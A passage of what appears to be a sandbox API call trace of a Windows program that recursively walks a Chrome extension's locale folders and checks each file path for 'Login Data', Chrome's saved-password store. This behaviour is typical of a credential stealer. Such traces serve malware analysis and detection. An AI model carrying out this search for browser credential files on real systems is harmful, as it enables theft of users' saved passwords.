ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.708] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.708] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.708] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.708] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned 137 [0161.708] lstrlenW (lpString="\\") returned 1 [0161.708] GetProcessHeap () returned 0x8e0000 [0161.708] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.708] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" [0161.708] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\" [0161.708] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\") returned 138 [0161.708] lstrlenW (lpString="messages.json") returned 13 [0161.708] GetProcessHeap () returned 0x8e0000 [0161.708] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.708] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\" [0161.708] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" [0161.708] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.708] GetProcessHeap () returned 0x8e0000 [0161.708] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.708] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json", lpSrch="Login Data") returned 0x0 [0161.709] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.709] GetProcessHeap () returned 0x8e0000 [0161.709] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.709] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.709] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.709] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.709] GetProcessHeap () returned 0x8e0000 [0161.709] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.709] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.709] GetProcessHeap () returned 0x8e0000 [0161.709] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.709] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="it", cAlternateFileName="")) returned 1 [0161.709] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0161.709] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0161.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.709] lstrlenW (lpString="\\") returned 1 [0161.709] GetProcessHeap () returned 0x8e0000 [0161.709] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.709] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.709] lstrlenW (lpString="it") returned 2 [0161.709] GetProcessHeap () returned 0x8e0000 [0161.709] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.709] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" [0161.709] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.709] GetProcessHeap () returned 0x8e0000 [0161.709] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned 137 [0161.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned 137 [0161.709] lstrlenW (lpString="\\*.*") returned 4 [0161.710] GetProcessHeap () returned 0x8e0000 [0161.710] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.710] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" [0161.710] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*.*" [0161.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.710] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.710] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.710] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.710] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.711] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.711] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned 137 [0161.711] lstrlenW (lpString="\\") returned 1 [0161.711] GetProcessHeap () returned 0x8e0000 [0161.711] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it" [0161.711] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\" [0161.711] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\") returned 138 [0161.711] lstrlenW (lpString="messages.json") returned 13 [0161.711] GetProcessHeap () returned 0x8e0000 [0161.711] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\" [0161.711] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" [0161.711] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.711] GetProcessHeap () returned 0x8e0000 [0161.711] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.711] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json", lpSrch="Login Data") returned 0x0 [0161.711] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.711] GetProcessHeap () returned 0x8e0000 [0161.711] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.711] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.711] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.711] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.711] GetProcessHeap () returned 0x8e0000 [0161.711] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.711] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.711] GetProcessHeap () returned 0x8e0000 [0161.711] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.711] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ja", cAlternateFileName="")) returned 1 [0161.711] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0161.711] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0161.711] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.712] lstrlenW (lpString="\\") returned 1 [0161.712] GetProcessHeap () returned 0x8e0000 [0161.712] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.712] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.712] lstrlenW (lpString="ja") returned 2 [0161.712] GetProcessHeap () returned 0x8e0000 [0161.712] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.712] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" [0161.712] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.712] GetProcessHeap () returned 0x8e0000 [0161.712] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned 137 [0161.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned 137 [0161.712] lstrlenW (lpString="\\*.*") returned 4 [0161.712] GetProcessHeap () returned 0x8e0000 [0161.712] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja" [0161.712] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 